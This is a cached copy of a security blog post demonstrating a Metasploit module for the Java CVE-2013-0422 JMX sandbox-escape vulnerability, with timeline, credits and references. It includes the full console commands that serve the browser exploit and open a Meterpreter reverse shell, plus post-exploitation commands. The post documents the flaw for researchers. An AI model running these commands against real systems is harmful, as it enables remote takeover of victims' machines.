« APSB13-02 – Adobe Reader and Acrobat January 2013 Security Bulletin Review
Gong Da / Gondad Exploit Pack Add Java CVE-2013-0422 support »

Java Applet JMX 0day Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered exploited in the wild by kafeine the 2013-01-10
Metasploit PoC provided the 2013-01-10

PoC provided by :

Unknown
egypt
sinn3r
juan vazquez

Reference(s) :

CVE-2013-0422
OSVDB-89059
0 day 1.7u10 spotted in the Wild – Disable Java Plugin NOW !

Affected version(s) :

Oracle Java SE 7 Update 10 and bellow

Tested on Windows 8 Pro with :

Internet Explorer 10
Oracle Java SE 7 Update 10

Description :

This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in January of 2013. The vulnerability affects Java version 7u10 and earlier.

Commands :

use exploit/windows/browser/ie_cbutton_uaf
use exploit/multi/browser/java_jre17_jmxbean
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sysinfo
getuid

Share this:

  • Email
  • Print

  • I recommend you to read these related posts

    • KaiXin Exploit Kit Evolutions
    • Watering Hole Campaign Use Latest Java and IE Vulnerabilities
    • Facebook, Apple & Twitter Watering Hole Attack Additional Informations
    • Gong Da / Gondad Exploit Pack Add Java CVE-2013-0422 support
    • CVE-2013-1493 aka Yet Another Oracle Java 0day
    • Cool Exploit Kit Remove Support of Java CVE-2012-1723
    • Gong Da / Gondad Exploit Pack Add Java CVE-2012-5076 support
    • When a Signed Java JAR file is not Proof of Trust
    • Gong Da / Gondad Exploit Pack Add Flash CVE-2013-0634 Support
    • Year 2012 Main Exploitable Vulnerabilities Interactive Timeline
    Zemanta
    CVE-2013-0422 EK Exploit Kit Java 0day Oracle Oracle Java 0day
    • 9 Replies
    • 0 Comments
    • 3 Tweets
    • 0 Facebook
    • 6 Pingbacks
    Last reply was 1 month ago
    spacer spacer spacer
    1. 菜菜’S Blog » [更新]新年初始,Java惊爆首个0day
      View 1 month ago

      [...] 详细链接及视频: eromang.zataz.com/2013/01/10/java-applet-jmx-0day-remote-code-execution-metasploit-demo/ [...]

      Reply
    2. Очередная 0day-уязвимость в Java: эксплойт уже готов | RIS
      View 1 month ago

      [...] Модуль Java Applet JMX 0day для Metasploit eromang.zataz.com/2013/01/10/java-applet-jmx-0.. [...]

      Reply
    3. 2013新年初始,Java惊爆首个0day | 独狼网络博客
      View 1 month ago

      [...] 详细链接及视频: eromang.zataz.com/2013/01/10/java-applet-jmx-0day-remote-code-execution-metasploit-demo/ [...]

      Reply
    4. [更新]新年初始,Java惊爆首个0day | 小马's Blog
      View 1 month ago

      [...] 详细链接及视频: eromang.zataz.com/2013/01/10/java-applet-jmx-0day-remote-code-execution-metasploit-demo/ [...]

      Reply
    5. 新年初始,Java惊爆首个0day- FreebuF.COM
      View 1 month ago

      [...] 详细链接及视频:eromang.zataz.com/2013/01/10/java-applet-jmx-0day-remote-code-execution-metasploit-demo/ [...]

      Reply
    6. illmob » Java 0day Demo
      View 1 month ago

      [...] Like clockwork , the new 0day has been added to metasploit. eromang was quick to record a demo of the exploit in action eromang.zataz.com [...]

      Reply
    Related searches:
    exploit oracle eromang applet gondad
    gipoco.com is neither affiliated with the authors of this page nor responsible for its contents. This is a safe-cache copy of the original web site.